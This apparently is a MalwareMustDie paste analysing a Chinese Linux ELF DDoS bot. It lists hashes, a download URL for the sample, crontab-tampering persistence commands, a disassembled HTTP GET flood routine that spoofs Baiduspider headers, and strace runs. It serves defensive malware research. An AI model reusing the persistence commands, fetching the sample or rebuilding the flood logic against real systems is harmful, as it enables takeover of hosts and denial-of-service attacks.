Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie! ELF anaysis
- # Title: " Evolution of a China ELF DDoS'er
- # Reference previous analysis: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
- # Noted: See how the previous analysed DDoS functions are developed into wider threat now..
- # Initial detection in Virus Total is 0/52 (FUD)
- # https://www.virustotal.com/en/file/19034c5fa31299e1d50e610dc3389d08db064d0c2a0aa1fb0bab0858532cd9c5/analysis/1406548491/
- #File name: sample
- #Detection ratio: 0 / 52
- #Analysis date: 2014-07-28 11:54:51 UTC ( 0 minutes ago )
- / ------------------ /
- / Sample Information /
- / ------------------ /
- / sample /
- MD5 : d96fe80de7483eb961b38456c5b207e8
- SHA256 : 19034c5fa31299e1d50e610dc3389d08db064d0c2a0aa1fb0bab0858532cd9c5
- / source /
- http://122.94.40.23:38384/.taobao
- Mon Jul 27 15:28:32 JST 2014|122.94.40.23||9394 | 122.94.0.0/16 | CTTNET | CN | CHINATIETONG.COM | CHINA TIETONG TELECOMMUNICATIONS CORPORATION
- / ------------------ /
- / Binary analysis /
- / ------------------ /
- / file /
- sample: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- / ELF Header /
- Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
- Class: ELF32
- Data: 2`s complement, little endian
- Version: 1 (current)
- OS/ABI: UNIX - System V
- ABI Version: 0
- Type: EXEC (Executable file)
- Machine: Intel 80386
- Version: 0x1
- Entry point address: 0x80480f0
- Start of program headers: 52 (bytes into file)
- Start of section headers: 500x804 (bytes into file)
- Flags: 0x0
- Size of this header: 52 (bytes)
- Size of program headers: 32 (bytes)
- Number of program headers: 4
- Size of section headers: 40 (bytes)
- Number of section headers: 25
- Section header string table index: 22
- / Section Headers /
- [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
- [ 0] NULL 00000000 000000 000000 00 0 0 0
- [ 1] .init PROGBITS 0x80480d4 0000d4 000017 00 AX 0 0 4
- [ 2] .text PROGBITS 0x80480f0 0000f0 061524 00 AX 0 0 16
- [ 3] __libc_freeres_fn PROGBITS 080a9614 061614 0008a2 00 AX 0 0 4
- [ 4] __libc_thread_fre PROGBITS 080a9eb8 061eb8 0000dc 00 AX 0 0 4
- [ 5] .fini PROGBITS 080a9f94 061f94 00001a 00 AX 0 0 4
- [ 6] .rodata PROGBITS 080a9fc0 061fc0 014b2e 00 A 0 0 32
- [ 7] __libc_atexit PROGBITS 080beaf0 076af0 000004 00 A 0 0 4
- [ 8] __libc_subfreeres PROGBITS 080beaf4 076af4 00003c 00 A 0 0 4
- [ 9] __libc_thread_sub PROGBITS 080beb30 076b30 000004 00 A 0 0 4
- [10] .eh_frame PROGBITS 080beb34 076b34 001c10 00 A 0 0 4
- [11] .ctors PROGBITS 080c1744 078744 00000c 00 WA 0 0 4
- [12] .dtors PROGBITS 080c1750 078750 00000c 00 WA 0 0 4
- [13] .jcr PROGBITS 080c175c 07875c 000004 00 WA 0 0 4
- [14] .data.rel.ro PROGBITS 080c1760 078760 00002c 00 WA 0 0 4
- [15] .got PROGBITS 080c178c 07878c 000004 04 WA 0 0 4
- [16] .got.plt PROGBITS 080c1790 078790 00000c 04 WA 0 0 4
- [17] .data PROGBITS 080c17a0 0787a0 001a34 00 WA 0 0 32
- [18] .bss NOBITS 080c31e0 07a1d4 083994 00 WA 0 0 32
- [19] __libc_freeres_pt NOBITS 08146b74 07a1d4 000020 00 WA 0 0 4
- [20] .comment PROGBITS 00000000 07a1d4 000168 00 0 0 1
- [21] .note.ABI-tag NOTE 0x80480b4 0000b4 000020 00 A 0 0 4
- [22] .shstrtab STRTAB 00000000 07a33c 000107 00 0 0 1
- [23] .symtab SYMTAB 00000000 07a82c 008070 10 24 517 4
- [24] .strtab STRTAB 00000000 08289c 00770b 00 0 0 1
- Key to Flags:
- W (write), A (alloc), X (execute), M (merge), S (strings)
- I (info), L (link order), G (group), x (unknown)
- O (extra OS processing required) o (OS specific), p (processor specific)
- / Program Headers /
- Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
- LOAD 0x000000 0x0x8048000 0x0x8048000 0x78744 0x78744 R E 0x1000
- LOAD 0x078744 0x080c1744 0x080c1744 0x01a90 0x85450 RW 0x1000
- NOTE 0x0000b4 0x0x80480b4 0x0x80480b4 0x00020 0x00020 R 0x4
- GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
- / Section to Segment mapping /
- Segment Sections...
- 00 .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_atexit __libc_subfreeres
- __libc_thread_subfreeres .eh_frame .note.ABI-tag
- 01 .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
- 02 .note.ABI-tag
- / What it doesn't have.. /
- There is no dynamic section in this file.
- There are no relocations in this file.
- There are no unwind sections in this file.
- There are no section groups in this file.
- / version info /
- Notes at offset 0x000000b4 with length 0x00000020:
- Owner Data size Description
- GNU 0x00000010 NT_VERSION (version)
- / ------------------ /
- / Reversing Notes.. /
- / ------------------ /
- / the hacks /
- / below files is opened in "insecured way"
- /etc/.mysys (drops)
- /etc/crontab (new schedule…, see below)
- chattr -i /etc/crontab
- chmod +w /etc/crontab
- sed -i '/%s/d' /etc/crontab
- echo '*/1 * * * * root %s/%s %s' >> /etc/crontab
- /* etc conf accessed: */
- /etc/suid-
- /var/tmp
- /var/profile
- /etc/host.conf
- /etc/nsswitch.conf
- / Made in China ..localz/
- .rodata:0x80BCCC0 i18n:1999
- .rodata:0x80BCCCA i18n:1999
- .rodata:0x80BCCD4 i18n:1999
- .rodata:080AA05C Accept-Language: zh-CN\r\n
- .rodata:080AA078 User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)\r\n
- / Made by the same coder as previous one.../
- .text:0x804ADC0 mov eax, [ebp+arg_4]
- .text:0x804ADC3 sub esp, 8
- .text:0x804ADC6 push offset aTaobao ; "taobao"
- .text:0x804ADCB push dword ptr [eax]
- / How to grab the DDoS functions /
- go from: public main > _ConnectServer > DealwithDDoS > you see these 5 functions called:
- SYN_Flood
- UDP_Flood
- GET_Flood
- ICMP_Flood
- DNS_Flood
- ; Reference, see embedded picture (see snapshot at: https://twitter.com/MalwareMustDie/status/493729921672310785 )
- / What'S new in this variant: L7 attack = HTTP flood, method: GET /
- .text:0x804A5CE loc_804A5CE:; Reference called from function: DealwithDDoS
- .text:0x804A5CE mov eax, [ebp+8]
- .text:0x804A5D1 mov eax, [eax+108h]
- .text:0x804A5D7 cmp eax, [ebp-0Ch]
- .text:0x804A5DA jle locret_804A67F
- .text:0x804A5E0 push dword ptr [ebp+8]
- .text:0x804A5E3 push offset GET_Flood ; go to the next blob...
- .text:0x804A5E8 push 0
- .text:0x804A5EA mov eax, [ebp+var_C]
- .text:0x804A5ED shl eax, 2
- .text:0x804A5F0 add eax, offset id
- .text:0x804A5F5 push eax
- .text:0x804A5F6 call pthread_create ; thread base dandori..
- .text:0x804A5FB add esp, 10h
- .text:0x804A5FE mov [ebp+var_41C], eax
- .text:0x804A604 lea eax, [ebp+var_C]
- .text:0x804A607 inc dword ptr [eax]
- .text:0x804A609 jmp short loc_804A5CE
- { : }
- .text:0x8049018 public GET_Flood
- .text:0x8049018 GET_Flood proc near; ; Reference called from function: DealwithDDoS
- .text:0x8049018 var_1015C = dword ptr -1015Ch
- .text:0x8049018 var_10158 = dword ptr -10158h
- .text:0x8049018 var_10154 = dword ptr -10154h
- .text:0x8049018 var_10148 = dword ptr -10148h
- .text:0x8049018 var_144 = dword ptr -144h
- .text:0x8049018 var_140 = dword ptr -140h
- .text:0x8049018 fd = dword ptr -13Ch
- .text:0x8049018 var_138 = dword ptr -138h
- .text:0x8049018 var_38 = dword ptr -38h
- .text:0x8049018 var_28 = dword ptr -28h
- .text:0x8049018 var_C = dword ptr -0Ch
- .text:0x8049018 arg_0 = dword ptr 8
- .text:0x8049018
- .text:0x8049018 push ebp ; threading started....
- .text:0x8049019 mov ebp, esp
- .text:0x804901B push ebx
- .text:0x804901C sub esp, 10164h
- .text:0x8049022 sub esp, 0Ch
- .text:0x8049025 sub esp, 4
- .text:0x8049028 call pthread_self
- .text:0x804902D add esp, 4
- .text:0x8049030 push eax
- .text:0x8049031 call pthread_detach
- .text:0x8049036 add esp, 10h
- .text:0x8049039 mov eax, [ebp+arg_0]
- .text:0x804903C mov [ebp+var_C], eax
- .text:0x804903F sub esp, 4
- .text:0x8049042 push 118h
- .text:0x8049047 push [ebp+var_C]
- .text:0x804904A lea eax, [ebp+var_138]
- .text:0x8049050 push eax
- .text:0x8049051 call memcpy ; memory allocations..
- .text:0x8049056 add esp, 10h
- .text:0x8049059 sub esp, 4
- .text:0x804905C push 10h
- .text:0x804905E push 0
- .text:0x8049060 lea eax, [ebp+var_10158]
- .text:0x8049066 push eax
- .text:0x8049067 call memset
- .text:0x804906C add esp, 10h
- .text:0x804906F sub esp, 8
- .text:0x8049072 push 10h
- .text:0x8049074 lea eax, [ebp+var_10158]
- .text:0x804907A push eax
- .text:0x804907B call bzero
- .text:0x8049080 add esp, 10h
- .text:0x8049083 mov word ptr [ebp+var_10158], 2
- .text:0x804908C mov eax, [ebp+var_38]
- .text:0x804908F movzx eax, ax
- .text:0x8049092 sub esp, 0Ch
- .text:0x8049095 push eax
- .text:0x8049096 call ntohs
- .text:0x804909B add esp, 10h
- .text:0x804909E mov word ptr [ebp+var_10158+2], ax
- .text:0x80490A5 sub esp, 0Ch
- .text:0x80490A8 lea eax, [ebp+var_138]
- .text:0x80490AE push eax
- .text:0x80490AF call AnalysisAddress
- .text:0x80490B4 add esp, 10h
- .text:0x80490B7 mov [ebp+var_10154], eax
- .text:0x80490BD
- .text:0x80490BD loc_80490BD: ; CODE XREF: GET_Flood+3B6j
- .text:0x80490BD sub esp, 4
- .text:0x80490C0 push 0
- .text:0x80490C2 push 1
- .text:0x80490C4 push 2 ; args
- .text:0x80490C6 call socket ; socket operations is initaited here..
- .text:0x80490CB add esp, 10h
- .text:0x80490CE mov [ebp+fd], eax
- .text:0x80490D4 sub esp, 4
- .text:0x80490D7 push 10h
- .text:0x80490D9 lea eax, [ebp+var_10158]
- .text:0x80490DF push eax
- .text:0x80490E0 push [ebp+fd] ; args
- .text:0x80490E6 call connect ; using the arg to connect..
- .text:0x80490EB add esp, 10h
- .text:0x80490EE cmp eax, 0FFFFFFFFh
- .text:0x80490F1 jnz short loc_8049109
- .text:0x80490F3 sub esp, 0Ch
- .text:0x80490F6 push [ebp+fd] ; fd
- .text:0x80490FC call close
- .text:0x8049101 add esp, 10h
- .text:0x8049104 jmp loc_80493C7
- .text:0x8049109
- .text:0x8049109 loc_8049109: ; if everything ok, this GET will be in loops..
- .text:0x8049109 sub esp, 4
- .text:0x804910C push 4
- .text:0x804910E push offset aGet ; "GET "
- .text:0x8049113 lea eax, [ebp+var_10148]
- .text:0x8049119 push eax
- .text:0x804911A call memcpy
- .text:0x804911F add esp, 10h
- .text:0x8049122 mov [ebp+var_140], 4
- .text:0x804912C sub esp, 4
- .text:0x804912F lea eax, [ebp+var_138]
- .text:0x8049135 sub eax, 0FFFFFF80h
- .text:0x8049138 sub esp, 8
- .text:0x804913B push eax
- .text:0x804913C call strlen
- .text:0x8049141 add esp, 0Ch
- .text:0x8049144 push eax
- .text:0x8049145 lea eax, [ebp+var_138]
- .text:0x804914B sub eax, 0FFFFFF80h
- .text:0x804914E push eax
- .text:0x804914F lea eax, [ebp+var_10148]
- .text:0x8049155 add eax, [ebp+var_140]
- .text:0x804915B push eax
- .text:0x804915C call memcpy
- .text:0x8049161 add esp, 10h
- .text:0x8049164 lea eax, [ebp+var_138]
- .text:0x804916A sub eax, 0FFFFFF80h
- .text:0x804916D sub esp, 0Ch
- .text:0x8049170 push eax
- .text:0x8049171 call strlen
- .text:0x8049176 add esp, 10h
- .text:0x8049179 mov edx, eax
- .text:0x804917B lea eax, [ebp+var_140]
- .text:0x8049181 add [eax], edx
- .text:0x8049183 cmp [ebp+var_28], 0
- .text:0x8049187 jz short loc_80491FC
- .text:0x8049189 sub esp, 0Ch
- .text:0x804918C push 0
- .text:0x804918E call time
- .text:0x8049193 add esp, 4
- .text:0x8049196 push eax
- .text:0x8049197 call srandom
- .text:0x804919C add esp, 10h
- .text:0x804919F mov eax, [ebp+var_140]
- .text:0x80491A5 mov [ebp+var_144], eax
- .text:0x80491AB
- .text:0x80491AB loc_80491AB:
- .text:0x80491AB mov eax, [ebp+var_140]
- .text:0x80491B1 add eax, 5
- .text:0x80491B4 cmp eax, [ebp+var_144]
- .text:0x80491BA jle short loc_80491F3
- .text:0x80491BC lea eax, [ebp+var_10148]
- .text:0x80491C2 mov ebx, eax
- .text:0x80491C4 add ebx, [ebp+var_144]
- .text:0x80491CA call rand
- .text:0x80491CF mov edx, eax
- .text:0x80491D1 mov [ebp+var_1015C], 1Ah
- .text:0x80491DB mov eax, edx
- .text:0x80491DD cdq
- .text:0x80491DE idiv [ebp+var_1015C]
- .text:0x80491E4 lea eax, [edx+61h]
- .text:0x80491E7 mov [ebx], al
- .text:0x80491E9 lea eax, [ebp+var_144]
- .text:0x80491EF inc dword ptr [eax]
- .text:0x80491F1 jmp short loc_80491AB
- .text:0x80491F3
- .text:0x80491F3 loc_80491F3:
- .text:0x80491F3 lea eax, [ebp+var_140]
- .text:0x80491F9 add dword ptr [eax], 5
- .text:0x80491FC
- .text:0x80491FC loc_80491FC:
- .text:0x80491FC sub esp, 4
- .text:0x80491FF push 0Bh ; here goes the headers....
- .text:0x8049201 push offset aHttp1_1 ; " HTTP/1.1\r\n"
- .text:0x8049206 lea eax, [ebp+var_10148]
- .text:0x804920C add eax, [ebp+var_140]
- .text:0x8049212 push eax
- .text:0x8049213 call memcpy
- .text:0x8049218 add esp, 10h
- .text:0x804921B lea eax, [ebp+var_140]
- .text:0x8049221 add dword ptr [eax], 0Bh
- .text:0x8049224 sub esp, 4
- .text:0x8049227 push 2Fh
- .text:0x8049229 push offset aAcceptTextHtml ; "Accept: text/html, application/xhtml+xm"...
- .text:0x804922E lea eax, [ebp+var_10148]
- .text:0x8049234 add eax, [ebp+var_140]
- .text:0x804923A push eax
- .text:0x804923B call memcpy
- .text:0x8049240 add esp, 10h
- .text:0x8049243 lea eax, [ebp+var_140]
- .text:0x8049249 add dword ptr [eax], 2Fh
- .text:0x804924C sub esp, 4
- .text:0x804924F push 18h
- .text:0x8049251 push offset aAcceptLanguage ; "Accept-Language: zh-CN\r\n"
- .text:0x8049256 lea eax, [ebp+var_10148]
- .text:0x804925C add eax, [ebp+var_140]
- .text:0x8049262 push eax
- .text:0x8049263 call memcpy
- .text:0x8049268 add esp, 10h
- .text:0x804926B lea eax, [ebp+var_140]
- .text:0x8049271 add dword ptr [eax], 18h
- .text:0x8049274 sub esp, 4
- .text:0x8049277 push 61h
- .text:0x8049279 push offset aUserAgentMozil ; "User-Agent: Mozilla/5.0+(compatible;+Ba"...
- .text:0x804927E lea eax, [ebp+var_10148]
- .text:0x8049284 add eax, [ebp+var_140]
- .text:0x804928A push eax
- .text:0x804928B call memcpy
- .text:0x8049290 add esp, 10h
- .text:0x8049293 lea eax, [ebp+var_140]
- .text:0x8049299 add dword ptr [eax], 61h
- .text:0x804929C sub esp, 4
- .text:0x804929F push 20h
- .text:0x80492A1 push offset aAcceptEncoding ; "Accept-Encoding: gzip, deflate\r\n"
- .text:0x80492A6 lea eax, [ebp+var_10148]
- .text:0x80492AC add eax, [ebp+var_140]
- .text:0x80492B2 push eax
- .text:0x80492B3 call memcpy
- .text:0x80492B8 add esp, 10h
- .text:0x80492BB lea eax, [ebp+var_140]
- .text:0x80492C1 add dword ptr [eax], 20h
- .text:0x80492C4 sub esp, 4
- .text:0x80492C7 push 6
- .text:0x80492C9 push offset aHost ; "Host: "
- .text:0x80492CE lea eax, [ebp+var_10148]
- .text:0x80492D4 add eax, [ebp+var_140]
- .text:0x80492DA push eax
- .text:0x80492DB call memcpy
- .text:0x80492E0 add esp, 10h
- .text:0x80492E3 lea eax, [ebp+var_140]
- .text:0x80492E9 add dword ptr [eax], 6
- .text:0x80492EC sub esp, 4
- .text:0x80492EF lea eax, [ebp+var_138]
- .text:0x80492F5 sub esp, 8
- .text:0x80492F8 push eax
- .text:0x80492F9 call strlen
- .text:0x80492FE add esp, 0Ch
- .text:0x8049301 push eax
- .text:0x8049302 lea eax, [ebp+var_138]
- .text:0x8049308 push eax
- .text:0x8049309 lea eax, [ebp+var_10148]
- .text:0x804930F add eax, [ebp+var_140]
- .text:0x8049315 push eax
- .text:0x8049316 call memcpy
- .text:0x804931B add esp, 10h
- .text:0x804931E lea eax, [ebp+var_138]
- .text:0x8049324 sub esp, 0Ch
- .text:0x8049327 push eax
- .text:0x8049328 call strlen
- .text:0x804932D add esp, 10h
- .text:0x8049330 mov edx, eax
- .text:0x8049332 lea eax, [ebp+var_140]
- .text:0x8049338 add [eax], edx
- .text:0x804933A sub esp, 4
- .text:0x804933D push 1Ah
- .text:0x804933F push offset aConnectionKeep ; "\r\nConnection: Keep-Alive\r\n"
- .text:0x8049344 lea eax, [ebp+var_10148]
- .text:0x804934A add eax, [ebp+var_140]
- .text:0x8049350 push eax
- .text:0x8049351 call memcpy
- .text:0x8049356 add esp, 10h
- .text:0x8049359 lea eax, [ebp+var_140]
- .text:0x804935F add dword ptr [eax], 1Ah
- .text:0x8049362 sub esp, 4
- .text:0x8049365 push 14h
- .text:0x8049367 push offset aPragmaNoCache ; "Pragma: no-cache\r\n\r\n"
- .text:0x804936C lea eax, [ebp+var_10148]
- .text:0x8049372 add eax, [ebp+var_140]
- .text:0x8049378 push eax
- .text:0x8049379 call memcpy
- .text:0x804937E add esp, 10h
- .text:0x8049381 lea eax, [ebp+var_140]
- .text:0x8049387 add dword ptr [eax], 14h
- .text:0x804938A sub esp, 8
- .text:0x804938D push 1
- .text:0x804938F push 0Dh
- .text:0x8049391 call ssignal
- .text:0x8049396 add esp, 10h
- .text:0x8049399 push 0
- .text:0x804939B push [ebp+var_140]
- .text:0x80493A1 lea eax, [ebp+var_10148]
- .text:0x80493A7 push eax
- .text:0x80493A8 push [ebp+fd] ; args
- .text:0x80493AE call send
- .text:0x80493B3 add esp, 10h
- .text:0x80493B6 sub esp, 0Ch
- .text:0x80493B9 push [ebp+fd] ; fd
- .text:0x80493BF call close
- .text:0x80493C4 add esp, 10h
- .text:0x80493C7
- .text:0x80493C7 loc_80493C7: ; done...
- .text:0x80493C7 cmp StopFlag, 1
- .text:0x80493CE jnz loc_80490BD
- .text:0x80493D4 sub esp, 0Ch
- .text:0x80493D7 push offset aSuccess ; "success"
- .text:0x80493DC call pthread_exit
- .text:0x80493DC GET_Flood endp
- / HTTP GET Flood's header summarized, pretending as the baidu spider /
- .rodata:0x80AA01A GET
- .rodata:0x80AA01F HTTP/1.1\r\n
- .rodata:0x80AA02C Accept: text/html, application/xhtml+xml, *|*\r\n
- .rodata:0x80AA05C Accept-Language: zh-CN\r\n
- .rodata:0x80AA078 User-Agent: Mozilla/5.0(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)\r\n
- .rodata:0x80AA0DC Accept-Encoding: gzip, deflate\r\n
- .rodata:0x80AA0FD Host:
- .rodata:0x80AA104 \r\nConnection: Keep-Alive\r\n
- .rodata:0x80AA11F Pragma: no-cache\r\n\r\n
- / how the ip target is fed, applied to the L7 flood by ARG /
- push offset aLu_Lu_Lu_Lu ; "%lu.%lu.%lu.%lu"
- push 10h
- / --------------------------------------- /
- / Debug… need ENOSYS sys call precompiled /
- / --------------------------------------- /
- / debug - 1st try /
- ; non root
- execve("./sample", ["./sample"], [/* 17 vars */]) = 0
- [ Process PID=32400 runs in 32 bit mode. ]
- uname({sys="Linux", node="1x111", ...}) = 0
- brk(0) = 0x8566000
- brk(0x8587000) = 0x8587000
- getrlimit(RLIMIT_STACK, {rlim_cur=-4286578688, rlim_max=0}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=-4292874240, rlim_max=0}) = 0
- getpid() = 32400
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], 0}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({0x2080aa344, -6106976, (nil), (nil), (nil), 18420514605488689824}) = -1 ENOSYS (Function not implemented)
- open("/proc/sys/kernel/version", O_RDONLY) = 3
- read(3, "#1 SMP Debian 3.2.60-1+deb7u1\n", 512) = 30
- close(3) = 0
- fork() = 32402
- exit_group(0) = ?
- rik@1x111 ~ $
- ; root
- execve("./sample", ["./sample"], [/* 20 vars */]) = 0
- [ Process PID=649 runs in 32 bit mode. ]
- uname({sys="Linux", node="1x111", ...}) = 0
- brk(0) = 0x9788000
- brk(0x97a9000) = 0x97a9000
- getrlimit(RLIMIT_STACK, {rlim_cur=-4286578688, rlim_max=0}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=-4292874240, rlim_max=0}) = 0
- getpid() = 649
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], 0}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], 0}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({0x2080aa344, -7628784, (nil), (nil), (nil), 18413978489897898656}) = -1 ENOSYS (Function not implemented)
- open("/proc/sys/kernel/version", O_RDONLY) = 3
- read(3, "#1 SMP Debian 3.2.60-1+deb7u1\n", 512) = 30
- close(3) = 0
- fork() = 650
- exit_group(0) = ?
- ; drops exists...
- # ls -alF /etc/.mysys
- ---------- 1 root root 0 Jul 28 12:57 /etc/.mysys
- / next (2nd) try /
- ; non root
- execve("./sample", ["./sample"], [/* 21 vars */]) = 0
- uname({sys="Linux", node="malware.must.die", ...}) = 0
- brk(0) = 0x9f3d000
- brk(0x9f5e000) = 0x9f5e000
- getrlimit(RLIMIT_STACK, {rlim_cur=10240*1024, rlim_max=RLIM_INFINITY}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=2044*1024, rlim_max=RLIM_INFINITY}) = 0
- getpid() = 1786
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({{CTL_KERN, KERN_VERSION}, 2, 0xbff22b10, 30, (nil), 0}) = 0
- fork() = 1787
- --- SIGCHLD (Child exited) @ 0 (0) ---
- exit_group(0) = ?
- ; root
- execve("./sample", ["./sample"], [/* 18 vars */]) = 0
- uname({sys="Linux", node="malware.must.die", ...}) = 0
- brk(0) = 0xa057000
- brk(0xa078000) = 0xa078000
- getrlimit(RLIMIT_STACK, {rlim_cur=10240*1024, rlim_max=RLIM_INFINITY}) = 0
- setrlimit(RLIMIT_STACK, {rlim_cur=2044*1024, rlim_max=RLIM_INFINITY}) = 0
- getpid() = 1822
- rt_sigaction(SIGRTMIN, {0x804c9b0, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_1, {0x804ca48, [RTMIN], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigaction(SIGRT_2, {0x804cb4c, [], SA_RESTORER, 0x8055288}, NULL, 8) = 0
- rt_sigprocmask(SIG_BLOCK, [RTMIN], NULL, 8) = 0
- rt_sigprocmask(SIG_UNBLOCK, [RT_1], NULL, 8) = 0
- _sysctl({{CTL_KERN, KERN_VERSION}, 2, 0xbfe50b70, 30, (nil), 0}) = 0
- fork() = 1823
- --- SIGCHLD (Child exited) @ 0 (0) ---
- exit_group(0) = ?
- ; drop exists...
- ls -alF /etc/.mysys
- ---------- 1 root root 0 Jul 28 20:11 /etc/.mysys
- /* Stupid coder…lol */
- ---
- #MalwareMustDie | analysis by @unixfreaxjp, samples: @wirehack7
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement